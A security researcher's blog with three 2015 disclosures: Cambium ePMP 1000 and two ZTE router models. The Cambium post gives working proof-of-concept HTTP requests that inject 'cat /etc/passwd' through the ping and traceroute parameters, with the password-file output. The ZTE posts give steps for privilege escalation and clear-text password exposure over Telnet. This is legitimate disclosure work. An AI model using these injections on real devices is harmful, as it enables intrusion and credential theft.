Sunday, November 29, 2015

Cambium ePMP 1000 - Multiple vulnerabilities

July 14, 2015: First contacted Cambium
July 14, 2015: Initial vendor response
July 16, 2015: Vuln Details reported to Cambium
July 31, 2015: Followup on advisory and fix timelines
August 03, 2015: Vendor gives mid-Aug as fix (v2.5) release timeline. Ceases communication.
Nov 19, 2015: Releasing vulnerability details & poc
Versions affected: < v2.5
Exploit-db: https://www.exploit-db.com/exploits/38776/
PacketStorm: https://packetstormsecurity.com/files/134483/cambiumepmp1000-exec.txt

.....
CVE-IDs - To be assigned.
.....
Background
http://www.cambiumnetworks.com/products/access/epmp-1000/

ePMP™ 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.

Deployed by:

ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media

Vulnerability Details

From Cambium Networks ePMP 1000 user / configuration guide:
ePMP 1000 has four (4) users -
- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.

.....

1. OS Command Injection

'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.

Ping function accepts destination IP address value via 'ping_ip
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl, to perform Ping.

Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.

The application does not perform strict input validation for all these
parameters - ping_ip', packets_num, buf_size and ttl for Ping
function; and traceroute_ip for Traceroute function.

This allows an authenticated user - 'admin' or non-admin,
low-privileged 'installer' & ‘home’ users - to be able to inject
arbitrary system commands that gets executed by the host.

.....
PING PoC
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
[
or

ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
or

ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
or

ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash

.....
traceroute - PoC
.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
2. Weak Authorization Controls + privilege escalation
'home' and 'readonly' users do not have access to Ping and Traceroute
functions via management portal. However, the application lacks strict
authorization controls, and we can still perform both these functions
by sending corresponding HTTP(S) requests directly, when logged in as
low-privileged, 'home' user.
When we combine this flaw with above described OS Command Injection
affecting ping and traceroute, it is possible for non-admin,
low-privileged, ‘home’ user to execute system level commands via
'ping' and 'traceroute' functions and dump password hashes easily and
/ or perform any system level functions.

Note: ‘readonly’ user cannot perform this. Only ‘home’ user can
exploit these.
.....
Steps to attack -
a login as home user
b craft & send HTTP request for ping and traceroute functions
.....
Login - HTTP Request
..
POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=home&password=<password>

.....
Login - HTTP Response
..

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server
{ "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status }

.....
Sending HTTP request for Ping function
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash

.....
Similarly, Traceroute function can be exploited.
............................................................................

3. Weak Authorization Controls + Information Disclosure

In addition to 'admin', only 'installer' user has the option to access
device configuration. ‘home’ user does not have GUI option and should
not be able to access / download device configuration. However, the
application lacks strict authorization measures and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.

Configuration backup export can be performed by directly accessing
the following url:
http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json

Upon a successful config export, full device configuration withclear-text passwords, usernames, keys, IP addresses, statistics, logs etc is downloaded.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server
{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",
<output - snipped>
}

Wednesday, November 18, 2015

ZTE ADSL ZXV10 W300 Modems - Multiple vulnerabilities

ZTE ADSL ZXV10 W300 Modems - Multiple vulnerabilities
Confirmed on 2 (of multiple) software versions - W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57

CVE-ID
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

Note: Large deployment size, primarily in Peru, used by TdP (Telefonica del Peru).

Insufficient authorization controls
CVE-ID: CVE-2015-7257
Observed in Password Change functionality. Other functions may be vulnerable as well.
Expected behavior:
Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password.
Vulnerability:
Any non-admin user can change 'admin' password.

Steps to reproduce:
a. Login as user 'support' password XXX 
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter ­ username ­ change from 'support' to 'admin'
e. Enter the new password ­> old password is not requested ­> Submit
> Login as admin 
-> Pwn!


Sensitive information disclosure - clear-text passwords
Displaying user information over Telnet connection, shows all valid users and their passwords in clear­-text.
CVE-ID: CVE-2015-7258
Steps to reproduce:
$ telnet <IP>
Trying <IP>... 
Connected to <IP>. 
Escape character is '^]'.
User Access Verification 
Username: admin 
Password: <­­­ admin/XXX1 
$sh
ADSL#login show                 <--­­­ shows user information
Username Password Priority 
admin        password1 2
support      password2 0
admin         password3 1

(Potential) Backdoor account feature - insecure account management
Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination.
CVE-ID: CVE-2015-7259
It is considered as a (redundant) login support feature.

Steps to reproduce:
$ telnet <IP>
Trying <IP>... 
Connected to <IP>. 
Escape character is '^]'.
User Access Verification 
User Access Verification 
Username: admin
Password: <­--­­ admin/password3
$sh
ADSL#login show
Username  Password  Priority 
admin  password1  2
support  password2  0
admin  password3  1

Thursday, November 5, 2015

ZTE ZXHN H108N R1A routers contain multiple vulnerabilities

CERT published a Vulnerability Note VU#391604, on my report for multiple vulnerabilities in ZTE ZXHN H108N R1A routers.
CVE #: 
CVE-2015-7248 
CVE-2015-7249 
CVE-2015-7250 
CVE-2015-7251 
CVE-2015-7252


Just found that ZTE PSIRT posted an official statement on Nov 18, 2015:
http://support.zte.com.cn/support//news/LoopholeInfoDetail.aspx?newsId=1006863

Note: Large deployment size, primarily in Peru, used by TdP (Telefonica del Peru).


Overview

ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.

Description

CWE-200: Information Exposure - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A.
  1. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc
  2. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE.

CWE-285: Improper Authorization - CVE-2015-7249

By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such asuser or support, and may be able to perform actions otherwise not allowed. For instance, while authenticated assupport, directly accessing http://<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsdpermits changing the password of user.

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CVE-2015-7250

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system.

CWE-798: Use of Hard-coded Credentials - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2015-7252

In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting.

Impact

A LAN-based attacker can obtain credentials and configuration information, bypass authentication, access arbitrary files, and gain complete control of affected devices. Note that in some configurations, an external attacker may be able to leverage these vulnerabilities.

Solution

Apply an update
The vendor has issued ZTE.bhs.ZXHNH108NR1A.k_PE to address the vulnerabilities affecting ZTE ZXHN H108N R1A. Users are encouraged to contact their Internet service provider for updates.

Note that W300 models are no longer officially supported and will not be receiving any updates. Users should consider the following workaround.
Discontinue use

ZTE states:
    The vulnerable W300 router was officially replaced by H108N V2.1 released in July 2014, and the vulnerable H108N was finished upgrading to version ZTE.bhs.ZXHNH108NR1A.k_PE through operator channel that all the vulnerabilities mentioned herein were fixed. ZTE recommends users to contact local operators for upgrade service.

Since patches will not be issued to address vulnerabilities in W300 routers, users should strongly consider discontinuing use of affected devices. Users of ISP-provisioned W300 devices should request replacement routers.

Credit

Thanks to Karn Ganeshen for reporting these vulnerabilities.

This document was written by Joel Land.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.